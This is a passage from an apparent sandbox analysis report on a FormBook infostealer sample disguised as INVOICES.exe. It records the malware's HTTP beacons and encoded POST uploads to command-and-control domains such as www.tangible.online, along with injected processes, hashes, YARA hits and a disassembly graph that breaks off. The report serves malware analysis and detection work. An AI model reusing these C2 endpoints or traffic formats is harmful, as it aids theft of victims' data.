                                                                                                                                Oct 29, 2024 16:57:20.748868942 CET424OUTGET /phwy/?edD=NOQPwZ+XOddShCAJaqjiSDvaSyosQYNdt8f0tOcuwTalyoR7fBY1X5bax8h0+UleX8GnGxtat7FR1fTM5b1BgdcwV2K5MrO24q3i2hacl5vfdQcLdxPRe77ACw5W73Ddrw==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.2q33e.top
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:57:21.717084885 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:57:21 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                53192.168.2.84976113.248.169.48805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:57:27.001729012 CET687OUTPOST /5byq/ HTTP/1.1
                                                                                                                                Host: www.tangible.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.tangible.online
                                                                                                                                Referer: http://www.tangible.online/5byq/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 49 4f 76 2b 69 33 62 30 32 6f 44 73 35 35 6d 32 53 58 36 56 2b 41 77 43 65 68 7a 4c 52 65 72 50 75 42 48 42 33 70 72 5a 53 34 34 65 71 59 35 4c 55 62 34 44 4f 42 4e 2f 62 71 4b 4d 46 55 53 38 65 6f 6e 38 47 4f 42 35 71 4b 35 45 39 59 51 4f 51 6c 2b 39 6b 42 49 54 6d 4c 6b 65 54 76 6f 36 35 6b 4a 48 4f 66 50 37 61 49 6d 73 78 30 39 5a 66 73 61 61 4d 75 4e 55 6c 7a 72 4f 71 4f 2b 32 49 78 4c 33 33 6b 46 79 61 75 44 52 6f 53 4b 2b 4c 74 33 73 44 46 36 4e 79 4d 4a 46 52 72 31 61 64 46 6f 75 4c 6c 68 42 6a 49 44 67 37 53 30 6f 38 2b 53 67 67 47 4b 59 6e 78 2f 37 59 57 41 56 32 39 48 50 41 2b 67 3d
                                                                                                                                Data Ascii: edD=IOv+i3b02oDs55m2SX6V+AwCehzLRerPuBHB3prZS44eqY5LUb4DOBN/bqKMFUS8eon8GOB5qK5E9YQOQl+9kBITmLkeTvo65kJHOfP7aImsx09ZfsaaMuNUlzrOqO+2IxL33kFyauDRoSK+Lt3sDF6NyMJFRr1adFouLlhBjIDg7S0o8+SggGKYnx/7YWAV29HPA+g=


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                54192.168.2.84976213.248.169.48805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:57:30.284787893 CET707OUTPOST /5byq/ HTTP/1.1
                                                                                                                                Host: www.tangible.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.tangible.online
                                                                                                                                Referer: http://www.tangible.online/5byq/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 49 4f 76 2b 69 33 62 30 32 6f 44 73 37 61 2b 32 43 41 75 56 2f 67 77 64 62 68 7a 4c 49 4f 71 49 75 42 4c 42 33 71 6e 4a 4f 63 55 65 71 39 64 4c 56 61 34 44 4c 42 4e 2f 49 71 4b 4e 61 45 53 4e 65 6f 72 43 47 50 4e 35 71 4a 46 45 39 64 30 4f 51 55 2b 36 6b 52 49 56 72 72 6b 6d 4f 66 6f 36 35 6b 4a 48 4f 66 4b 67 61 4d 4b 73 78 6b 74 5a 65 4e 61 5a 46 4f 4e 58 78 6a 72 4f 35 65 2b 4d 49 78 4b 59 33 6c 4a 59 61 73 37 52 6f 54 36 2b 46 66 50 76 59 56 36 4c 2f 73 49 48 55 76 34 2b 66 6c 42 4d 4f 6a 4a 77 38 4b 44 48 36 6b 46 43 6d 63 61 6d 6a 47 69 7a 6e 79 58 4e 64 68 64 39 73 65 58 2f 65 70 31 54 34 2f 45 36 79 35 66 44 30 51 43 79 50 42 44 39 64 67 66 4c
                                                                                                                                Data Ascii: edD=IOv+i3b02oDs7a+2CAuV/gwdbhzLIOqIuBLB3qnJOcUeq9dLVa4DLBN/IqKNaESNeorCGPN5qJFE9d0OQU+6kRIVrrkmOfo65kJHOfKgaMKsxktZeNaZFONXxjrO5e+MIxKY3lJYas7RoT6+FfPvYV6L/sIHUv4+flBMOjJw8KDH6kFCmcamjGiznyXNdhd9seX/ep1T4/E6y5fD0QCyPBD9dgfL


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                55192.168.2.84976313.248.169.48805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:57:33.479274035 CET1724OUTPOST /5byq/ HTTP/1.1
                                                                                                                                Host: www.tangible.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.tangible.online
                                                                                                                                Referer: http://www.tangible.online/5byq/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 49 4f 76 2b 69 33 62 30 32 6f 44 73 37 61 2b 32 43 41 75 56 2f 67 77 64 62 68 7a 4c 49 4f 71 49 75 42 4c 42 33 71 6e 4a 4f 63 63 65 71 4c 52 4c 55 35 41 44 4d 42 4e 2f 54 4b 4b 49 61 45 53 51 65 72 61 46 47 50 52 32 71 50 4a 45 73 4c 6f 4f 57 6e 6d 36 75 52 49 56 33 62 6b 64 54 76 6f 6a 35 6e 78 39 4f 66 61 67 61 4d 4b 73 78 69 68 5a 58 38 61 5a 44 4f 4e 55 6c 7a 72 53 71 4f 2f 6a 49 78 54 76 33 6c 64 69 61 64 62 52 6f 7a 71 2b 49 4d 33 76 46 46 36 4a 36 73 49 6c 55 6f 77 68 66 6c 4d 39 4f 6e 42 57 38 49 54 48 32 52 6b 36 36 59 4c 6c 35 45 75 43 69 42 37 64 51 52 5a 51 68 59 4c 31 55 49 4e 6d 70 76 45 31 79 71 66 51 32 69 44 64 56 48 75 79 53 6c 53 2b 66 65 31 50 55 50 43 31 64 42 52 69 35 7a 62 33 62 44 65 67 74 42 66 67 4b 39 57 79 5a 57 32 33 6e 6c 6b 54 66 32 4b 55 4f 64 56 77 49 62 74 35 79 45 67 5a 53 2b 67 6a 4b 61 67 43 76 58 43 69 45 6c 6d 48 4c 62 51 66 6b 76 39 55 57 48 4a 35 6b 6d 76 64 70 39 54 4b 62 6e 42 6b 73 48 39 2f 68 7a 58 6f 56 72 6f 62 72 59 77 39 35 6d 58 69 4e 52 [TRUNCATED]
                                                                                                                                Data Ascii: edD=IOv+i3b02oDs7a+2CAuV/gwdbhzLIOqIuBLB3qnJOcceqLRLU5ADMBN/TKKIaESQeraFGPR2qPJEsLoOWnm6uRIV3bkdTvoj5nx9OfagaMKsxihZX8aZDONUlzrSqO/jIxTv3ldiadbRozq+IM3vFF6J6sIlUowhflM9OnBW8ITH2Rk66YLl5EuCiB7dQRZQhYL1UINmpvE1yqfQ2iDdVHuySlS+fe1PUPC1dBRi5zb3bDegtBfgK9WyZW23nlkTf2KUOdVwIbt5yEgZS+gjKagCvXCiElmHLbQfkv9UWHJ5kmvdp9TKbnBksH9/hzXoVrobrYw95mXiNRO4wHaPFtLpmhW5lqHuxn7Ke9Edt9Y5trWz0Xdl7UxivFV7ujhjfp4ECkSCe6cT0RBMpkoPn2YVrtAYOXU1cGJKG4zwaNIxZmP2N1Dm5ZS/r+703QW8m9tKiWOK8OaX7r6VvyZHWc6U8ECNmEsfv/j0Yo8DsoGRNyhWjXrgCGsmBUomH3fsrIS6uE7NpRDzAvMmuKlUkJdm+TgT7TH6g2TWxEoGin7p+olLAa0YrEkW8d4QZeS0+90dircIn3UFvfXo1Jp1trkx0e9YxvNW2juV+PiumC1v1VI26MIRxFluEiX8pNfawLhVsGAXYBAwvHbhReSvGp4dtVifa0dTDJC/IMnuQI104z1apR5RtFfLkSzMhg3F/HD6q18pOlszBS6FaRZQwRPsKTR+xFmGXzqjVSES7BeYoCcUFiSIhilTv1X6SeXqtgtAxDNGyY+PBxQkH9BVAPk/puSfNO/U9I1Z4fqDDhOZj+oEyorHAlqvDq3zZxzQohjZOZuZgqpxUix2ph8InZ+8YcF6uea4S6rDKI9SjRG4wCeScmXHeTxtzI8Ku20gNt9cjAhDMxlAPem3FUmcv4l4+TB8Y/+uZNRYvwGKOyLwTIMzTvFSjlLVS33Hatp0LBNiqK//9EX5TDvIXE6RuPfbXitqJveh0BJRHJvb/bsFXWxI [TRUNCATED]


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:11:53:23
                                                                                                                                Start date:29/10/2024
                                                                                                                                Path:C:\Users\user\Desktop\INVOICES.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\INVOICES.exe"
                                                                                                                                Imagebase:0x730000
                                                                                                                                File size:700'416 bytes
                                                                                                                                MD5 hash:90C8EF1083FBF63AE33F23D51513A611
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:11:53:24
                                                                                                                                Start date:29/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\INVOICES.exe"
                                                                                                                                Imagebase:0x5b0000
                                                                                                                                File size:46'504 bytes
                                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:11:53:41
                                                                                                                                Start date:29/10/2024
                                                                                                                                Path:C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe"
                                                                                                                                Imagebase:0xb50000
                                                                                                                                File size:140'800 bytes
                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:5
                                                                                                                                Start time:11:53:43
                                                                                                                                Start date:29/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\AtBroker.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\SysWOW64\AtBroker.exe"
                                                                                                                                Imagebase:0xf50000
                                                                                                                                File size:68'608 bytes
                                                                                                                                MD5 hash:D5B61959A509BDA85300781F5A829610
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:6
                                                                                                                                Start time:11:54:00
                                                                                                                                Start date:29/10/2024
                                                                                                                                Path:C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe"
                                                                                                                                Imagebase:0xb50000
                                                                                                                                File size:140'800 bytes
                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:11:54:12
                                                                                                                                Start date:29/10/2024
                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                Imagebase:0x7ff6d20e0000
                                                                                                                                File size:676'768 bytes
                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:3.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:1.7%
                                                                                                                                  Signature Coverage:9.6%
                                                                                                                                  Total number of Nodes:1977
                                                                                                                                  Total number of Limit Nodes:155
                                                                                                                                  execution_graph 97626 733633 97627 73366a 97626->97627 97628 7336e7 97627->97628 97629 733688 97627->97629 97665 7336e5 97627->97665 97631 76d24c 97628->97631 97632 7336ed 97628->97632 97633 733695 97629->97633 97634 73375d PostQuitMessage 97629->97634 97630 7336ca NtdllDefWindowProc_W 97668 7336d8 97630->97668 97676 7411d0 10 API calls Mailbox 97631->97676 97635 7336f2 97632->97635 97636 733715 SetTimer RegisterClipboardFormatW 97632->97636 97637 7336a0 97633->97637 97638 76d2bf 97633->97638 97634->97668 97640 76d1ef 97635->97640 97641 7336f9 KillTimer 97635->97641 97642 73373e CreatePopupMenu 97636->97642 97636->97668 97643 733767 97637->97643 97644 7336a8 97637->97644 97681 79281f 71 API calls _memset 97638->97681 97648 76d1f4 97640->97648 97649 76d228 MoveWindow 97640->97649 97671 7344cb Shell_NotifyIconW _memset 97641->97671 97642->97668 97674 734531 64 API calls _memset 97643->97674 97651 7336b3 97644->97651 97656 76d2a4 97644->97656 97646 76d273 97677 7411f3 341 API calls Mailbox 97646->97677 97653 76d217 SetFocus 97648->97653 97654 76d1f8 97648->97654 97649->97668 97657 73374b 97651->97657 97658 7336be 97651->97658 97653->97668 97654->97658 97660 76d201 97654->97660 97655 73370c 97672 733114 DeleteObject DestroyWindow Mailbox 97655->97672 97656->97630 97680 787f5e 59 API calls Mailbox 97656->97680 97673 7345df 81 API calls _memset 97657->97673 97658->97630 97678 7344cb Shell_NotifyIconW _memset 97658->97678 97659 76d2d1 97659->97630 97659->97668 97675 7411d0 10 API calls Mailbox 97660->97675 97665->97630 97666 73375b 97666->97668 97669 76d298 97679 7343db 68 API calls _memset 97669->97679 97671->97655 97672->97668 97673->97666 97674->97666 97675->97668 97676->97646 97677->97658 97678->97669 97679->97665 97680->97665 97681->97659 97682 770155 97691 73ade2 Mailbox 97682->97691 97684 770bb5 97700 7863f2 59 API calls Mailbox 97684->97700 97686 770bbe 97689 73b6c1 97699 799ed4 89 API calls 4 library calls 97689->97699 97691->97684 97691->97686 97691->97689 97693 7ae037 97691->97693 97696 739df0 59 API calls Mailbox 97691->97696 97697 738e34 59 API calls Mailbox 97691->97697 97698 7871e5 59 API calls 97691->97698 97701 7acbf1 97693->97701 97695 7ae047 97695->97691 97696->97691 97697->97691 97698->97691 97699->97684 97700->97686 97739 739997 97701->97739 97705 7acecd 97706 7ad042 97705->97706 97711 7acedb 97705->97711 97807 7ad9dc 92 API calls Mailbox 97706->97807 97709 7ad051 97709->97711 97712 7ad05d 97709->97712 97710 739997 84 API calls 97729 7accc6 Mailbox 97710->97729 97770 7aca82 97711->97770 97722 7acc75 Mailbox 97712->97722 97717 7acf14 97785 750d88 97717->97785 97720 7acf2e 97791 799ed4 89 API calls 4 library calls 97720->97791 97721 7acf47 97792 73942e 97721->97792 97722->97695 97725 7acf39 GetCurrentProcess TerminateProcess 97725->97721 97729->97705 97729->97710 97729->97722 97789 79f656 59 API calls 2 library calls 97729->97789 97790 7ad0f3 61 API calls 2 library calls 97729->97790 97730 7ad0b8 97730->97722 97735 7ad0cc FreeLibrary 97730->97735 97732 7acf7f 97804 7ad75d 107 API calls _free 97732->97804 97735->97722 97738 7acf90 97738->97730 97805 738ea0 59 API calls Mailbox 97738->97805 97806 739e9c 60 API calls Mailbox 97738->97806 97808 7ad75d 107 API calls _free 97738->97808 97740 7399b1 97739->97740 97749 7399ab 97739->97749 97741 7399b7 __itow 97740->97741 97742 7399f9 97740->97742 97747 76f92c __i64tow 97740->97747 97748 76f833 97740->97748 97809 750f36 97741->97809 97823 753818 83 API calls 4 library calls 97742->97823 97746 7399d1 97746->97749 97819 737f41 97746->97819 97750 750f36 Mailbox 59 API calls 97748->97750 97755 76f8ab Mailbox _wcscpy 97748->97755 97749->97722 97757 7ad8b9 97749->97757 97752 76f878 97750->97752 97753 750f36 Mailbox 59 API calls 97752->97753 97754 76f89e 97753->97754 97754->97755 97756 737f41 59 API calls 97754->97756 97824 753818 83 API calls 4 library calls 97755->97824 97756->97755 97853 737faf 97757->97853 97759 7ad8d4 CharLowerBuffW 97857 78f479 97759->97857 97766 7ad924 97882 737e8c 97766->97882 97768 7ad930 Mailbox 97769 7ad96c Mailbox 97768->97769 97886 7ad0f3 61 API calls 2 library calls 97768->97886 97769->97729 97771 7aca9d 97770->97771 97775 7acaf2 97770->97775 97772 750f36 Mailbox 59 API calls 97771->97772 97773 7acabf 97772->97773 97774 750f36 Mailbox 59 API calls 97773->97774 97773->97775 97774->97773 97776 7adb64 97775->97776 97777 7add8d Mailbox 97776->97777 97781 7adb87 _strcat _wcscpy __NMSG_WRITE 97776->97781 97777->97717 97778 739d46 59 API calls 97778->97781 97779 739c9c 59 API calls 97779->97781 97780 739cf8 59 API calls 97780->97781 97781->97777 97781->97778 97781->97779 97781->97780 97782 739997 84 API calls 97781->97782 97783 75588c 58 API calls __crtLCMapStringA_stat 97781->97783 97891 79592e 61 API calls 2 library calls 97781->97891 97782->97781 97783->97781 97787 750d9d 97785->97787 97786 750e35 VirtualAlloc 97788 750e03 97786->97788 97787->97786 97787->97788 97788->97720 97788->97721 97789->97729 97790->97729 97791->97725 97793 739436 97792->97793 97794 750f36 Mailbox 59 API calls 97793->97794 97795 739444 97794->97795 97796 739450 97795->97796 97892 73935c 59 API calls Mailbox 97795->97892 97798 7391b0 97796->97798 97893 7392c0 97798->97893 97800 7391bf 97801 750f36 Mailbox 59 API calls 97800->97801 97802 73925b 97800->97802 97801->97802 97802->97738 97803 738ea0 59 API calls Mailbox 97802->97803 97803->97732 97804->97738 97805->97738 97806->97738 97807->97709 97808->97738 97811 750f3e 97809->97811 97812 750f58 97811->97812 97814 750f5c std::exception::exception 97811->97814 97825 75588c 97811->97825 97842 753521 RtlDecodePointer 97811->97842 97812->97746 97843 75871b RaiseException 97814->97843 97816 750f86 97844 758651 58 API calls _free 97816->97844 97818 750f98 97818->97746 97820 737f50 __NMSG_WRITE _memmove 97819->97820 97821 750f36 Mailbox 59 API calls 97820->97821 97822 737f8e 97821->97822 97822->97749 97823->97741 97824->97747 97826 755907 97825->97826 97835 755898 97825->97835 97851 753521 RtlDecodePointer 97826->97851 97828 75590d 97852 758ca8 58 API calls __getptd_noexit 97828->97852 97831 7558cb RtlAllocateHeap 97832 7558ff 97831->97832 97831->97835 97832->97811 97834 7558a3 97834->97835 97845 75a2eb 58 API calls __NMSG_WRITE 97834->97845 97846 75a348 58 API calls 5 library calls 97834->97846 97847 75321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97834->97847 97835->97831 97835->97834 97836 7558f3 97835->97836 97840 7558f1 97835->97840 97848 753521 RtlDecodePointer 97835->97848 97849 758ca8 58 API calls __getptd_noexit 97836->97849 97850 758ca8 58 API calls __getptd_noexit 97840->97850 97842->97811 97843->97816 97844->97818 97845->97834 97846->97834 97848->97835 97849->97840 97850->97832 97851->97828 97852->97832 97854 737fc2 97853->97854 97856 737fbf _memmove 97853->97856 97855 750f36 Mailbox 59 API calls 97854->97855 97855->97856 97856->97759 97859 78f4a4 __NMSG_WRITE 97857->97859 97858 78f4e3 97858->97768 97864 7377c7 97858->97864 97859->97858 97860 78f58a 97859->97860 97863 78f4d9 97859->97863 97860->97858 97888 737a24 61 API calls 97860->97888 97863->97858 97887 737a24 61 API calls 97863->97887 97865 750f36 Mailbox 59 API calls 97864->97865 97866 7377e8 97865->97866 97867 750f36 Mailbox 59 API calls 97866->97867 97868 7377f6 97867->97868 97869 7379ab 97868->97869 97870 737a17 97869->97870 97871 7379ba 97869->97871 97872 737e8c 59 API calls 97870->97872 97871->97870 97873 7379c5 97871->97873 97878 7379e8 _memmove 97872->97878 97874 7379e0 97873->97874 97875 76ee62 97873->97875 97889 738087 59 API calls Mailbox 97874->97889 97890 738189 59 API calls Mailbox 97875->97890 97878->97766 97879 76ee6c 97880 750f36 Mailbox 59 API calls 97879->97880 97881 76ee8c 97880->97881 97883 737ea3 _memmove 97882->97883 97884 737e9a 97882->97884 97883->97768 97884->97883 97885 737faf 59 API calls 97884->97885 97885->97883 97886->97769 97887->97863 97888->97860 97889->97878 97890->97879 97891->97781 97892->97796 97894 7392c9 Mailbox 97893->97894 97895 76f4f8 97894->97895 97900 7392d3 97894->97900 97896 750f36 Mailbox 59 API calls 97895->97896 97898 76f504 97896->97898 97897 7392da 97897->97800 97900->97897 97901 739df0 59 API calls Mailbox 97900->97901 97901->97900 97902 9423b0 97916 940000 97902->97916 97904 942457 97919 9422a0 97904->97919 97906 942480 CreateFileW 97908 9424d4 97906->97908 97909 9424cf 97906->97909 97908->97909 97910 9424eb VirtualAlloc 97908->97910 97910->97909 97911 942509 ReadFile 97910->97911 97911->97909 97912 942524 97911->97912 97913 9412a0 13 API calls 97912->97913 97914 942557 97913->97914 97915 94257a ExitProcess 97914->97915 97915->97909 97922 943480 GetPEB 97916->97922 97918 94068b 97918->97904 97920 9422a9 Sleep 97919->97920 97921 9422b7 97920->97921 97923 9434aa 97922->97923 97923->97918 97924 731066 97929 73f8cf 97924->97929 97926 73106c 97962 752ec0 97926->97962 97930 73f8f0 97929->97930 97965 750083 97930->97965 97934 73f937 97935 7377c7 59 API calls 97934->97935 97936 73f941 97935->97936 97937 7377c7 59 API calls 97936->97937 97938 73f94b 97937->97938 97939 7377c7 59 API calls 97938->97939 97940 73f955 97939->97940 97941 7377c7 59 API calls 97940->97941 97942 73f993 97941->97942 97943 7377c7 59 API calls 97942->97943 97944 73fa5e 97943->97944 97975 7460e7 97944->97975 97948 73fa90 97949 7377c7 59 API calls 97948->97949 97950 73fa9a 97949->97950 98003 74ff1e 97950->98003 97952 73fae1 97953 73faf1 GetStdHandle 97952->97953 97954 774904 97953->97954 97955 73fb3d 97953->97955 97954->97955 97957 77490d 97954->97957 97956 73fb45 OleInitialize 97955->97956 97956->97926 98010 796be1 64 API calls Mailbox 97957->98010 97959 774914 98011 7972b0 CreateThread 97959->98011 97961 774920 CloseHandle 97961->97956 98035 752dc4 97962->98035 97964 731076 98012 75015c 97965->98012 97968 75015c 59 API calls 97969 7500c5 97968->97969 97970 7377c7 59 API calls 97969->97970 97971 7500d1 97970->97971 98019 737d2c 97971->98019 97973 73f8f6 97974 7502e2 6 API calls 97973->97974 97974->97934 97976 7377c7 59 API calls 97975->97976 97977 7460f7 97976->97977 97978 7377c7 59 API calls 97977->97978 97979 7460ff 97978->97979 98030 745bfd 97979->98030 97982 